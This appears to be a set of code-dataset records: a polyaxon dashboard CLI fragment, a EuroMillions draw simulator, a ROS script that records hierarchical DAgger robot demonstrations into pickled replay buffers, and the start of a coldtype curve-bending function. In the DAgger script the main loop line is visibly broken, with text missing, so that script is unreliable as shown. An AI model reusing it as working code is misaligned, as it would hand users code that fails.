browser. Continue?\",\n        default=True,\n    ):\n        click.launch(dashboard_url)\n\n\n@click.command()\n@click.option(\n    \"--yes\",\n    \"-y\",\n    is_flag=True,\n    default=False,\n    help=\"Automatic yes to prompts. \"\n    'Assume \"yes\" as answer to all prompts and run non-interactively.',\n)\n@click.option(\n    \"--url\", is_flag=True, default=False, help=\"Print the url of the dashboard.\"\n)\n@clean_outputs\ndef dashboard(yes, url):\n    \"\"\"Open dashboard in browser.\"\"\"\n    get_dashboard(dashboard_url=get_dashboard_url(), url_only=url, yes=yes)\n","sub_path":"core/polyaxon/cli/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"3816632","text":"import random\r\n# GLOBAL VARIABLES\r\n###################################\r\n\r\n########################################################\r\n# FUNCTIONS\r\n########################################################\r\n# function to read an integer from the user\r\ndef introducirNumero():\r\n    while True:\r\n        try:\r\n            numero = int(input(\"Please enter a number: \"))\r\n            return numero\r\n        except ValueError:\r\n            print(\"Oops! That wasn't valid. 
Try again...\")\r\n# end function ########################################################\r\n\r\n# function to check whether a number is already in an array\r\ndef comprobarRepetidosArrayNumero(arrayComp , numero):\r\n    comp = False\r\n    for elemento in arrayComp:\r\n        if elemento == numero:\r\n            comp = True\r\n    return comp\r\n# end function ########################################################\r\n\r\n# function to enter my bet\r\ndef introducirMiApuestaMultiple():\r\n    # enter your EuroMillions numbers\r\n    print('Enter your EuroMillions numbers. You may pick 5 to 10, and none may be negative, 0 or greater than 50')\r\n    print('Enter how many EuroMillions numbers you want to bet')\r\n    numeroApuestasNumero = introducirNumero()\r\n    contadorNumerosPrimitiva = 1\r\n    miPrimitiva = []\r\n    miNumero = 0\r\n    # collect the numbers\r\n    while contadorNumerosPrimitiva < (numeroApuestasNumero + 1):\r\n        # read one number\r\n        print('Type number ' + str(contadorNumerosPrimitiva))\r\n        miNumero = introducirNumero()\r\n        if miNumero < 1 or miNumero > 50:\r\n            print('That number is not valid')\r\n        else:\r\n            if contadorNumerosPrimitiva == 1:\r\n                miPrimitiva.append(miNumero)\r\n                contadorNumerosPrimitiva = contadorNumerosPrimitiva + 1\r\n                print('Number entered correctly')\r\n            else:\r\n                # False means the number is not repeated\r\n                if comprobarRepetidosArrayNumero(miPrimitiva,miNumero) == False:\r\n                    miPrimitiva.append(miNumero)\r\n                    contadorNumerosPrimitiva = contadorNumerosPrimitiva + 1\r\n                    print('Number entered correctly')\r\n                else: # and if it is repeated\r\n                    print('That number is repeated')\r\n\r\n\r\n    # enter your EuroMillions stars\r\n    print('Enter your EuroMillions stars. You may pick 2 to 5, and none may be negative, 0 or greater than 12')\r\n    print('Enter how many EuroMillions stars you want to bet')\r\n    numeroApuestasSeries = introducirNumero()\r\n    contadorSeriesPrimitiva = 1\r\n    misSeries = []\r\n    miSerie = 0\r\n    # collect the stars\r\n    while contadorSeriesPrimitiva < (numeroApuestasSeries + 1):\r\n        # read one star\r\n        print('Type star number ' + str(contadorSeriesPrimitiva))\r\n        miSerie = introducirNumero()\r\n        if miSerie < 1 or miSerie > 12:\r\n            print('That star is not valid')\r\n        else:\r\n            if contadorSeriesPrimitiva == 1:\r\n                misSeries.append(miSerie)\r\n                contadorSeriesPrimitiva = contadorSeriesPrimitiva + 1\r\n                print('Star entered correctly')\r\n            else:\r\n                # False means the star is not repeated\r\n                if comprobarRepetidosArrayNumero(misSeries,miSerie) == False:\r\n                    misSeries.append(miSerie)\r\n                    contadorSeriesPrimitiva = contadorSeriesPrimitiva + 1\r\n                    print('Star entered correctly')\r\n                else: # and if it is repeated\r\n                    print('That star is repeated')\r\n\r\n\r\n    miApuesta = [miPrimitiva,misSeries]\r\n    # print my numbers (join them all, since anywhere from 5 to 10 may have been entered)\r\n    print(\"Your EuroMillions numbers are = \" + \" - \".join(str(n) for n in miPrimitiva))\r\n    # print my stars\r\n    print(\"Your EuroMillions stars are = \" + \" - \".join(str(s) for s in misSeries))\r\n\r\n    return miApuesta\r\n# end function ########################################################\r\n\r\n\r\n# function to generate EuroMillions draw results\r\ndef crearResultadosEuromillon():\r\n    print('How many EuroMillions draws do you want to create to compare your numbers against')\r\n    numPrim = int(input('Enter the number of 
draws = '))\r\n    contEuroMillones = 1\r\n    numeroAleatorio = 0\r\n    arrayNumerosEuroMillon = []\r\n    NumerosEuroMillon = []\r\n\r\n    arraySeriesEuroMillon = []\r\n    SeriesEuroMillon = []\r\n\r\n    # create the draw numbers\r\n    for i in range(0, numPrim):\r\n        while contEuroMillones < 6:\r\n            numeroAleatorio = random.randint(1, 50)\r\n            # all of this checks that a single draw has no repeated numbers\r\n            if contEuroMillones == 1:\r\n                NumerosEuroMillon.append(numeroAleatorio)\r\n                contEuroMillones = contEuroMillones + 1\r\n            else:\r\n                # False means the number is not repeated\r\n                if comprobarRepetidosArrayNumero(NumerosEuroMillon,numeroAleatorio) == False:\r\n                    NumerosEuroMillon.append(numeroAleatorio)\r\n                    contEuroMillones = contEuroMillones + 1\r\n\r\n        contEuroMillones = 1\r\n\r\n        #######################################\r\n        # print('EUROMILLIONS NUMBERS ' + str(i+1))\r\n        # for j in range(len(NumerosEuroMillon)):\r\n        #     print(NumerosEuroMillon[j], end=' ')\r\n        # print()\r\n\r\n        #######################################\r\n        # store this draw's NUMBERS in the result array\r\n        arrayNumerosEuroMillon.append(NumerosEuroMillon)\r\n        # empty the array for the next iteration\r\n        NumerosEuroMillon = []\r\n\r\n\r\n    contEuroMillones = 1\r\n    # create the draw stars\r\n    for i in range(0, numPrim):\r\n        while contEuroMillones < 3:\r\n            # stars range from 1 to 12, not 1 to 50\r\n            numeroAleatorio = random.randint(1, 12)\r\n            # all of this checks that a single draw has no repeated stars\r\n            if contEuroMillones == 1:\r\n                SeriesEuroMillon.append(numeroAleatorio)\r\n                contEuroMillones = contEuroMillones + 1\r\n            else:\r\n                # False means the star is not repeated\r\n                if comprobarRepetidosArrayNumero(SeriesEuroMillon,numeroAleatorio) == False:\r\n                    SeriesEuroMillon.append(numeroAleatorio)\r\n                    contEuroMillones = contEuroMillones + 1\r\n\r\n        contEuroMillones = 1\r\n\r\n        #######################################\r\n        # print('EUROMILLIONS STARS ' + str(i+1))\r\n        # for j in range(len(SeriesEuroMillon)):\r\n        #     print(SeriesEuroMillon[j], end=' ')\r\n        # print()\r\n        #\r\n        #######################################\r\n        # store this draw's STARS in the result array\r\n        arraySeriesEuroMillon.append(SeriesEuroMillon)\r\n        # empty the array for the next iteration\r\n        SeriesEuroMillon = []\r\n\r\n    # RETURN RESULTS\r\n    totalResultados = [arrayNumerosEuroMillon,arraySeriesEuroMillon]\r\n    return totalResultados\r\n\r\n# end function ########################################################\r\n\r\n# function to count how many entries of one array appear in another\r\ndef sumarRepeticionesDosArrays(arrayMisNumerosP, arrayEuro):\r\n    numAciertos = 0\r\n    for i in range(len(arrayEuro)):\r\n        if comprobarRepetidosArrayNumero(arrayMisNumerosP , arrayEuro[i]) == True:\r\n            numAciertos = numAciertos + 1\r\n    return numAciertos\r\n# end function ########################################################\r\n\r\n# function to compare the bet against the simulated draws\r\ndef comprobarAciertosEuroMillones(miApuesta,resultadosEuroMILLON):\r\n    arrayNumeroApuesta = miApuesta[0] # the bet's numbers\r\n    arraySerieApuesta = miApuesta[1] # the bet's stars\r\n\r\n    # aciertos[stars][numbers] tallies the simulated draws in which exactly that\r\n    # many of our stars (0-2) and numbers (0-5) came up\r\n    aciertos = [[0] * 6 for _ in range(3)]\r\n\r\n    
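# A draw holds 5 numbers and 2 stars, so the two match counts below can never index outside the 3x6 matrix allocated above.\r\n    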
numerosSorteos = resultadosEuroMILLON[0] # one list of 5 numbers per draw\r\n    seriesSorteos = resultadosEuroMILLON[1] # one list of 2 stars per draw\r\n\r\n    for j in range(len(numerosSorteos)):\r\n        numerosSorteo = numerosSorteos[j]\r\n        seriesSorteo = seriesSorteos[j]\r\n        # count the matched stars for this draw (compare the bet's stars, not its numbers)\r\n        numeroSerieAciertos = sumarRepeticionesDosArrays(arraySerieApuesta, seriesSorteo)\r\n        # count the matched numbers for this draw\r\n        numeroTotalAciertos = sumarRepeticionesDosArrays(arrayNumeroApuesta, numerosSorteo)\r\n        aciertos[numeroSerieAciertos][numeroTotalAciertos] = aciertos[numeroSerieAciertos][numeroTotalAciertos] + 1\r\n\r\n    # then we print the results\r\n    print('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')\r\n    
print('xxxxxxxxxRESULTSxxxxxxxxxxxxxxxxxx')\r\n    print('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')\r\n    for series in range(3):\r\n        for numeros in range(6):\r\n            print(str(aciertos[series][numeros]) + ' TICKETS WITH ' + str(numeros) + ' NUMBERS MATCHED AND ' + str(series) + ' STARS MATCHED')\r\n        print('')\r\n\r\n# end function ########################################################\r\n\r\n# main script\r\nmiApuesta = introducirMiApuestaMultiple()\r\nresultadosEuroMILLON = crearResultadosEuromillon()\r\ncomprobarAciertosEuroMillones(miApuesta,resultadosEuroMILLON)\r\n","sub_path":"Listas/EuroMillon_ApuestaMultiple.py","file_name":"EuroMillon_ApuestaMultiple.py","file_ext":"py","file_size_in_byte":14894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"307864120","text":"#!/usr/bin/env python\n\nimport numpy as np\nfrom Sawyer_DynaGoalEnv_DAgger import demoEnv # REFACTOR TO REMOVE GOALS\nimport rospy\n# Leveraging demonstration is same as TD3\n\n\nfrom std_srvs.srv import Empty, EmptyRequest\nfrom running_mean_std import RunningMeanStd\nfrom SetupSummary import SummaryManager_HIRO as SummaryManager\nimport pickle\nimport os\nfrom collections import OrderedDict\nfrom state_action_space import *\n# intera imports \nfrom intera_interface import CHECK_VERSION\nfrom intera_interface import Limb\nfrom intera_interface import Gripper\n\nfrom tf_conversions import posemath\nfrom tf.msg import tfMessage\nfrom tf.transformations import quaternion_from_euler\nfrom intera_core_msgs.msg import (\n    DigitalIOState,\n    DigitalOutputCommand,\n    IODeviceStatus\n)\n\nfrom geometry_msgs.msg import (\n    PoseStamped,\n    Pose,\n    Point,\n    Quaternion,\n)\n\nimport time as timer\nimport time\n\nfrom std_msgs.msg import Header\n# save running mean std for demo transition (SummaryManager is already imported above)\nrms_path = '/home/irobot/catkin_ws/src/ddpg/scripts/ecsac_aux/'\ndemo_path = '/home/irobot/catkin_ws/src/ddpg/scripts/ecsac_aux/'\nMAN_BUF_FNAME = 'demo_manager_buffer.bin'\nCON_BUF_FNAME = 'demo_controller_buffer.bin'\n\nclass 
DemoReplayBuffer(object):\n    \"\"\"\n    A simple FIFO experience replay buffer for ECSAC + HIRO agents.\n    For HIRO, we need separate replay buffers for both manager and controller policies.\n    low-level controller does not require state-action sequence\n    high-level controller requires extra buffer for state-action \n    \"\"\"\n\n    def __init__(self, obs_dim, stt_dim, act_dim, aux_dim, size, manager=False):\n        # 9 types of data in buffer\n        self.obs_buf = np.zeros(shape=(size,)+ obs_dim, dtype=np.float32) # o_t, (-1,100,100,3)\n        self.obs1_buf = np.zeros(shape=(size,)+ obs_dim, dtype=np.float32) # o_t+1, (-1,100,100,3)\n        self.g_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32) # g_t, (-1,21)\n        self.g1_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32) # g_t+1, (-1,21)\n        self.stt_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32) # s_t (-1,21), joint pos, vel, eff\n        self.stt1_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32) # s_t+1, (-1,21), consists of pos, vel, eff\n        # the action buffer's width depends on the owner: 8-dim raw actions for the\n        # controller, full-state-sized subgoal actions for the manager\n        if not manager:\n            self.act_buf = np.zeros(shape=(size , act_dim), dtype=np.float32) # a_t (-1,8)\n        else:\n            self.act_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32)\n        self.rews_buf = np.zeros(shape=(size,), dtype=np.float32)\n        self.done_buf = np.zeros(shape=(size,), dtype=np.float32)\n        self.aux_buf = np.zeros(shape=(size , aux_dim), dtype=np.float32)\n        self.aux1_buf = np.zeros(shape=(size , aux_dim), dtype=np.float32)\n        self.ptr, self.size, self.max_size = 0, 0, size\n\n    def store(self, obs, obs1, g, g1, stt, stt1, act, aux, aux1, rew, done, manager=False):\n        \"\"\"store step transition in the buffer\n        \"\"\"\n        self.obs_buf[self.ptr] = obs\n        self.obs1_buf[self.ptr] = obs1\n        self.g_buf[self.ptr] = g\n        self.g1_buf[self.ptr] = g1\n        self.stt_buf[self.ptr] = stt\n        self.stt1_buf[self.ptr] = stt1\n        self.act_buf[self.ptr] = act\n        self.rews_buf[self.ptr] = rew\n        self.done_buf[self.ptr] = done\n        self.aux_buf[self.ptr] = aux\n        self.aux1_buf[self.ptr] = aux1 # store the next-step auxiliary observation, not aux again\n        if not manager:\n            self.ptr = (self.ptr+1) % self.max_size\n            self.size = min(self.size+1, self.max_size)\n\n\n    def get_episodic_subgoal(self, global_step, ep_len):\n        \"\"\" Return the subgoal and fullstate batch of the episode.\n        \n        slicing index : buf[global_step - ep_len:global_step-1] => slice out only the transitions for this episode.\n        \"\"\"\n        return [self.stt_buf[global_step-ep_len:global_step], self.stt1_buf[global_step-ep_len:global_step], \n                self.g_buf[global_step-ep_len:global_step], self.g1_buf[global_step-ep_len:global_step]]\n\n\n    def return_buffer(self):\n        \"\"\" Returns the whole numpy arrays containing demo transitions.\n        \"\"\"\n        return {'data':[self.obs_buf[:self.ptr], self.obs1_buf[:self.ptr], self.g_buf[:self.ptr], \n                        self.g1_buf[:self.ptr], self.stt_buf[:self.ptr], self.stt1_buf[:self.ptr],\n                        self.act_buf[:self.ptr], self.rews_buf[:self.ptr], self.done_buf[:self.ptr],\n                        self.aux_buf[:self.ptr], self.aux1_buf[:self.ptr]],\n                'size':self.size}\n\n\nclass DemoManagerReplayBuffer(DemoReplayBuffer):\n    \"\"\"\n    A simple FIFO experience replay buffer for ECSAC + HIRO agents.\n    For HIRO, we need separate replay buffers for both manager and controller policies.\n    low-level controller does not require state-action sequence\n    high-level controller requires extra buffer for state-action \n    \"\"\"\n\n    def __init__(self, obs_dim, stt_dim, act_dim, aux_dim, size, seq_len):\n        \"\"\"full-state/ color_observation sequence lists' shape[1] is +1 longer than that of \n        
action seqence -> they are stored as s_t:t+c/o_t:t+c, while action is stored as a_t:t+c\n \"\"\"\n\n super(DemoManagerReplayBuffer, self).__init__(obs_dim, stt_dim, act_dim, aux_dim, size, manager=True)\n\n self.stt_seq_buf = np.zeros(shape=(size, seq_len+1, stt_dim), dtype=np.float32) # s_t (-1, 10+1, 21), joint pos, vel, eff\n self.obs_seq_buf = np.zeros(shape=(size, seq_len+1,)+ obs_dim, dtype=np.float32) # o_t, (-1, 10+1, 100, 100, 3)\n self.act_seq_buf = np.zeros(shape=(size, seq_len, act_dim), dtype=np.float32) # a_t (-1,10, 8)\n\n def store(self, stt_seq, obs_seq, act_seq, *args, **kwargs):\n \"\"\"store step transition in the buffer\n \"\"\"\n super(DemoManagerReplayBuffer, self).store(manager=True, *args, **kwargs)\n \n self.stt_seq_buf[self.ptr] = np.array(stt_seq)\n self.obs_seq_buf[self.ptr] = np.array(obs_seq)\n self.act_seq_buf[self.ptr] = np.array(act_seq)\n self.ptr = (self.ptr+1) % self.max_size\n self.size = min(self.size+1, self.max_size)\n\n def return_buffer(self):\n \"\"\" Returns the whole numpy arrays containing demo transitions, for manager transitions\n \"\"\"\n return {'data':[self.obs_buf[:self.ptr], self.obs1_buf[:self.ptr], self.g_buf[:self.ptr],\n self.g1_buf[:self.ptr], self.stt_buf[:self.ptr], self.stt1_buf[:self.ptr],\n self.act_buf[:self.ptr], self.rews_buf[:self.ptr], self.done_buf[:self.ptr],\n self.aux_buf[:self.ptr], self.aux1_buf[:self.ptr]],\n 'seq_data':[self.stt_seq_buf[:self.ptr], self.obs_seq_buf[:self.ptr], self.act_seq_buf[:self.ptr]],\n 'size':self.size}\n\n\ndef normalize(x, stats):\n if stats is None:\n return x\n return (x - stats.mean) / stats.std\n\n\n# def normalize_action(action_arr):\n# lb_array = ACTION_LOW_BOUND*np.ones(action_arr.shape)\n# hb_array = ACTION_HIGH_BOUND*np.ones(action_arr.shape)\n# _norm_action = lb_array + (action_arr+1.0*np.ones(action_arr.shape))*0.5*(hb_array - lb_array)\n# _norm_action = np.clip(_norm_action, lb_array, hb_array)\n# _norm_action = _norm_action.reshape(action_arr.shape)\n# return _norm_action\n\n\ndef randomize_world():\n \"\"\" Domain randomization for the environment's light and the color of robot link.\n \"\"\"\n rospy.wait_for_service('/dynamic_world_service') # randomize the light in the gazebo world\n dynamic_world_service_call = rospy.ServiceProxy('/dynamic_world_service', Empty)\n change_env_request = EmptyRequest()\n dynamic_world_service_call(change_env_request)\n\n # rospy.wait_for_service('/colorize_world_service') # randomize the model colors in the gazebo world\n # colorize_world_service_call = rospy.ServiceProxy('/colorize_world_service', Empty)\n # colorize_env_request = EmptyRequest()\n # colorize_world_service_call(colorize_env_request)\n\nif __name__ == '__main__':\n\n USE_CARTESIAN = True\n USE_GRIPPER = True\n IS_TRAIN = True # always true for DAgger script\n\n # define observation dimensions\n # for low_level controller\n obs_dim = (100, 100, 3) # for actor in POMDP\n stt_dim = 21# full_state of the robot (joint positions, velocities, and efforts) + ee position\n act_dim = 8 # 7 joint vels and gripper position \n aux_dim = 3 # target object's position\n # define joint vel_limits\n action_space = (-1.0, 1.0)\n ee_dim = 7 # 4 quaternion\n grip_dim = 1 # 1 dimension for the gripper position\n\n # for high_level controller\n des_goal_dim = 21 # (joint positions, velocities, and efforts) + ee position\n sub_goal_dim = 21 # (joint positions, velocities, and efforts) + ee position\n\n if USE_CARTESIAN: # append 7-dim\n stt_dim += ee_dim\n des_goal_dim += ee_dim\n sub_goal_dim += 
ee_dim\n\n if USE_GRIPPER: # append 1-dim\n stt_dim += grip_dim\n des_goal_dim += grip_dim\n sub_goal_dim += grip_dim\n\n # init node\n # rospy.init_node('hierarchical_DAgger')\n\n # demo quantity related\n total_epi = 1\n max_ep_len = 500\n total_steps = total_epi * max_ep_len\n buffer_size = int(1e4) # 50000 steps : is it enough?\n manager_propose_freq = 10\n\n isDemo = True\n ep_ret, ep_len = 0, 0\n t = 0 # counted steps [0:total_steps - 1]\n timesteps_since_manager = 0 # to count c-step elapse for training manager\n timesteps_since_subgoal = 0 # to count c-step elapse for subgoal proposal\n episode_num = 0 # incremental episode counter\n done = True\n reset = False\n manager_temp_transition = list() # temp manager transition\n\n # demoEnv inherits robotEnv\n env = demoEnv(max_steps=max_ep_len, control_mode='velocity', isPOMDP=True, isGripper=USE_GRIPPER, isCartesian=USE_CARTESIAN, train_indicator=IS_TRAIN)\n controller_buffer = DemoReplayBuffer(obs_dim=obs_dim, stt_dim=stt_dim, act_dim=act_dim, aux_dim=aux_dim, size=buffer_size)\n manager_buffer = DemoManagerReplayBuffer(obs_dim=obs_dim, stt_dim=stt_dim, act_dim=act_dim, aux_dim=aux_dim, size=buffer_size, seq_len=manager_propose_freq)\n obs_shape_list = [(100,100,3), (7), (7), (7), (1), (7), (3)]\n summary_manager = SummaryManager(obs_shape_list=obs_shape_list) # manager for rms\n\n # create instances for the arm and gripper\n limb = Limb()\n gripper = Gripper()\n\n def update_rms(full_stt=None, c_obs=None, aux=None, act=None):\n \"\"\"Update the mean/stddev of the running mean-std normalizers.\n Normalize full-state, color_obs, and auxiliary observation.\n Caution on the shape!\n \"\"\"\n summary_manager.s_t0_rms.update(c_obs) # c_obs\n summary_manager.s_t1_rms.update(full_stt[:7]) # joint_pos\n summary_manager.s_t2_rms.update(full_stt[7:14]) # joint_vel\n summary_manager.s_t3_rms.update(full_stt[14:21]) # joint_eff\n summary_manager.s_t4_rms.update(full_stt[21:22]) # gripper_position\n summary_manager.s_t5_rms.update(full_stt[22:]) # ee_pose\n summary_manager.s_t6_rms.update(aux) # aux\n summary_manager.a_t_rms.update(act) # ee_pose\n\n\n def load_rms():\n rospy.logwarn('Loads the mean and stddev for test time')\n summary_manager.s_t0_rms.load_mean_std(rms_path+'mean_std0_demo.bin')\n summary_manager.s_t1_rms.load_mean_std(rms_path+'mean_std1_demo.bin')\n summary_manager.s_t2_rms.load_mean_std(rms_path+'mean_std2_demo.bin')\n summary_manager.s_t3_rms.load_mean_std(rms_path+'mean_std3_demo.bin')\n summary_manager.s_t4_rms.load_mean_std(rms_path+'mean_std4_demo.bin')\n summary_manager.s_t5_rms.load_mean_std(rms_path+'mean_std5_demo.bin')\n summary_manager.s_t6_rms.load_mean_std(rms_path+'mean_std6_demo.bin')\n summary_manager.a_t_rms.load_mean_std(rms_path+'mean_std7_demo.bin')\n \n\n def save_rms(step):\n rospy.logwarn('Saves the mean and stddev @ step %d', step)\n summary_manager.s_t0_rms.save_mean_std(rms_path+'mean_std0_demo.bin')\n summary_manager.s_t1_rms.save_mean_std(rms_path+'mean_std1_demo.bin')\n summary_manager.s_t2_rms.save_mean_std(rms_path+'mean_std2_demo.bin')\n summary_manager.s_t3_rms.save_mean_std(rms_path+'mean_std3_demo.bin')\n summary_manager.s_t4_rms.save_mean_std(rms_path+'mean_std4_demo.bin')\n summary_manager.s_t5_rms.save_mean_std(rms_path+'mean_std5_demo.bin')\n summary_manager.s_t6_rms.save_mean_std(rms_path+'mean_std6_demo.bin')\n summary_manager.a_t_rms.save_mean_std(rms_path+'mean_std7_demo.bin')\n \n\n def get_demo_temp_subgoal():\n \"\"\" return the temporary subgoal for demo transition.\n \"\"\"\n 
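# A zero vector is only a placeholder: the expert subgoals are back-filled afterwards by demo_manager_sg_transition (s_t+c as the manager action) and demo_controller_sg_transition (the h(s, g, s') relabeling).\n        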
return np.zeros(sub_goal_dim)\n\n\n def demo_manager_sg_transition(manager_transition):\n \"\"\" This function is called every C-step.\n replace the temp subgoals in temp manager buffer with expert subgoals for the rollout batches.\n The demo agent achieves the subgoal for every step, i.e. h = s + g - s'\n g_t == s_t+c (action of the manager)\n *manager_transition :\n [s_seq, o_seq, a_seq, obs, obs_1, dg, dg_1, stt, stt_1, act, aux, aux_1, rew, done]\n replace the temp. subgoal (a_t of the manager) with s_t+c-1\n \"\"\"\n manager_transition[-5] = manager_transition[0][-1]\n return manager_transition\n\n\n def demo_controller_sg_transition(controller_buffer, global_step, ep_len):\n \"\"\" This function is called at the end of each episode.\n *controller_buffer :\n controller_buffer.store(c_obs, next_c_obs, subgoal, \n next_subgoal, full_stt, next_full_stt, action, aux, next_aux, intrinsic_reward, done)\n subgoal for the controller -> for every C-step sequence,\n * h = s + g - s'\n g_t == s_t+c, g' = h(s,g,s'), g'' = h(s',g',s'') ...\n *don't do subgoal_transition and intrinsic reward computation while doing rollouts. \n controller transition (s_t||s_t+c & s_t+1||s_t+c+1) -> TD learning\n in terms of controller -> g_t:t+c-1\n index : 2 & 3\n \"\"\"\n # s_t+c should be the g_t for s_t. (e.g. s_10 == g_0 -> induces new proposal)\n sb, s1b, gb, g1b = controller_buffer.get_episodic_subgoal(global_step, ep_len) # returns each batch of the transition e\n # ep_len - ep_len % manager_propose_freq\n # Example : if an episode is 647 length, iterate till 640 (idx 639). Then, gb[640:646] should all be the terminal state. \n # 1. replace the subgoal proposals in 'gb'\n\n remainder = ep_len % manager_propose_freq\n for idx in range(0, ep_len - remainder - manager_propose_freq, manager_propose_freq): # iterate until the full proposal period is met.\n gb[idx] = s1b[idx + manager_propose_freq - 1] # s1b[idx + manager_propose_freq - 1] has the s_(idx + manager_propose_freq)\n for i in range(1, manager_propose_freq): #[t+1:t+c-1]\n gb[idx + i] = env.env_goal_transition(sb[idx + i], s1b[idx + i], gb[idx])\n # 2. fill ther remaining transitions with terminal state observations\n # here, gb[-1], gb[-2], ... gb[-7] = sT in example. \n sT = s1b[-1]\n for idx in range(1,remainder + 1):\n gb[-idx] = sT\n # 3. copy the gb into g1b, with the index offset of 1. Then the last element of g1b is sT.\n g1b[:-1] = gb[1:]\n g1b[-1] = sT\n \n\n def get_action():\n \"\"\" return the action inference from the external controller.\n \"\"\"\n return env._get_demo_action()\n \n\n # divide the loop into two phase.\n # 1. 
rollout (collecting normal transition data (s, a, r, s', d))\n\n while not rospy.is_shutdown() and t task specific goal!\n done = False\n reset = False\n ep_len = 0 # length of the episode\n ep_ret = 0 # episode return for the manager\n ep_low_ret = 0 # return of the intrinsic reward for low level controller \n episode_num += 1 # for every env.reset()\n\n # process observations\n full_stt = np.concatenate(obs['observation']['full_state'], axis=0) # s_0\n c_obs = obs['observation']['color_obs'] #o_0\n des_goal = np.concatenate(obs['desired_goal']['full_state'], axis=0) # g_des\n aux = obs['auxiliary'] # g_des\n\n # infer subgoal for low-level policy\n # args for get_subgoal : obs, next_obs, sub_goal\n subgoal = get_demo_temp_subgoal() # action_dim = (1, stt_dim) -> defaults to 25-dim\n timesteps_since_subgoal = 0\n # apply noise on the subgoal\n # create a temporal high-level transition : requires off-policy correction\n # buffer store arguments : s_seq, o_seq, a_seq, obs, obs_1, dg, dg_1, stt, stt_1, act, aux, aux_1, rew, done \n manager_temp_transition = [[full_stt], [c_obs], [], c_obs, None, des_goal, des_goal, full_stt, None, subgoal, aux, None, 0, False]\n\n action = get_action() # a_t\n # TODO: make action on the gripper as categorical policy\n # action[-1] = reloc_rescale_gripper(action[-1])\n next_obs, manager_reward, done = env.step_demo(action, time_step=ep_len) # reward R_t-> for high-level manager -> for sum(R_t:t+c-1)\n randomize_world()\n # update episodic logs\n # Ignore the \"done\" signal if it comes from hitting the time\n # horizon (that is, when it's an artificial terminal signal\n # that isn't based on the agent's state) -> if done = False for the max_timestep\n # DO NOT Make done = True when it hits timeout\n ep_ret += manager_reward # reward in terms of achieving episodic task\n done = False if ep_len== max_ep_len else done\n if done:\n rospy.logwarn('=============== Now epsiode %d ends with done signal! 
====================', episode_num)\n next_full_stt = np.concatenate(next_obs['observation']['full_state']) # s_t\n next_c_obs = next_obs['observation']['color_obs'] #o_t\n next_aux = obs['auxiliary'] # g_des\n\n # append manager transition\n manager_temp_transition[-1] = float(True)\n manager_temp_transition[-2] += manager_reward # sum(R_t:t+c)\n manager_temp_transition[0].append(next_full_stt) # append s_seq\n manager_temp_transition[1].append(next_c_obs) # append o_seq\n manager_temp_transition[2].append(action) # append a_seq \n # compute intrinsic reward\n intrinsic_reward = env.compute_intrinsic_reward(full_stt, next_full_stt, subgoal)\n\n # subgoal transition\n next_subgoal = env.env_goal_transition(full_stt, next_full_stt, subgoal)\n # add transition for low-level policy\n # (obs, obs1, sg, sg1, stt, stt1, act, aux, rew, done)\n controller_buffer.store(c_obs, next_c_obs, subgoal, \n next_subgoal, full_stt, next_full_stt, action, aux, next_aux, intrinsic_reward, done)\n # update observations and subgoal\n obs = next_obs\n subgoal = next_subgoal\n aux = next_aux\n\n # update logging steps\n ep_len += 1\n t +=1\n timesteps_since_manager += 1\n timesteps_since_subgoal += 1\n\n if timesteps_since_subgoal % manager_propose_freq == 0:\n # for every c-step, renew the subgoal estimation from the manager policy.\n timesteps_since_subgoal = 0\n manager_temp_transition[4] = c_obs # save o_t+c\n manager_temp_transition[8] = full_stt # save s_t+c\n manager_temp_transition[11] = aux # save aux_t+c\n manager_temp_transition[-1] = float(True) # done = True for manager, regardless of the episode \n \n # intentional seq appending is not required here since it always satisfies c step.\n\n # rospy.logwarn('Debug manager transitions. Debug manager transitions.')\n # print (manager_temp_transition[2])\n # rospy.logwarn('Debug manager transitions. Debug manager transitions.')\n manager_buffer.store(*manager_temp_transition)\n subgoal = get_demo_temp_subgoal() # action_dim = (1, stt_dim) -> defaults to 25-dim\n # Create a high level transition : note that the action of manager policy is subgoal\n # buffer store arguments : s_seq, o_seq, a_seq, obs, obs_1, dg, dg_1, stt, stt_1, act, aux, aux_1, rew, done \n manager_temp_transition = [[full_stt], [c_obs], [], c_obs, None, des_goal, des_goal, full_stt, None, subgoal, aux, None, 0, False]\n # update running mean-std normalizer\n update_rms(full_stt=full_stt, c_obs=c_obs, aux=aux, act=action) # do it.\n\n # if all the demo episodes have ended.\n\n os.chdir(demo_path)\n if os.path.exists(MAN_BUF_FNAME):\n print ('Deletes the manger buffer')\n ans = input(\"Delete the manager buffer? '1' / '0' \")\n rospy.logwarn('=======================================================')\n if ans == 1:\n os.remove(MAN_BUF_FNAME)\n if os.path.exists(CON_BUF_FNAME):\n print ('Deletes the controller buffer')\n ans = input(\"Delete the controller buffer? 
'1' / '0' \")\n if ans == 1:\n os.remove(CON_BUF_FNAME)\n rospy.logwarn('=======================================================')\n\n print ('Now saves the manager buffer in pickle format')\n with open (MAN_BUF_FNAME, 'wb') as f: \n pickle.dump(manager_buffer.return_buffer(), f)\n print ('Now saves the controller buffer in pickle format')\n with open (CON_BUF_FNAME, 'wb') as f2: \n pickle.dump(controller_buffer.return_buffer(), f2)\n\n\n ","sub_path":"hierarchical_DAgger.py","file_name":"hierarchical_DAgger.py","file_ext":"py","file_size_in_byte":24203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"229615194","text":"import math\nfrom coldtype.beziers import CurveCutter, splitCubicAtT\n\n\ndef bend(pen, curve, tangent=True):\n def _bend(pen):\n cc = CurveCutter(curve)\n ccl = cc.length\n dpl = pen.bounds().point(\"SE\").x\n xf = ccl/dpl\n\n def bender(x, y):\n p, tan = cc.subsegmentPoint(end=x*xf)\n px, py = p\n if tangent:\n a = math.sin(math.radians(180+tan)) * y\n b = math.cos(math.radians(180+tan)) * y\n return (px+a, py+b)\n #return (px, y+py)\n else:\n return (px, y+py)\n return pen.nonlinear_transform(bender)\n return _bend\n\n\ndef bend2(curve, tangent=True, 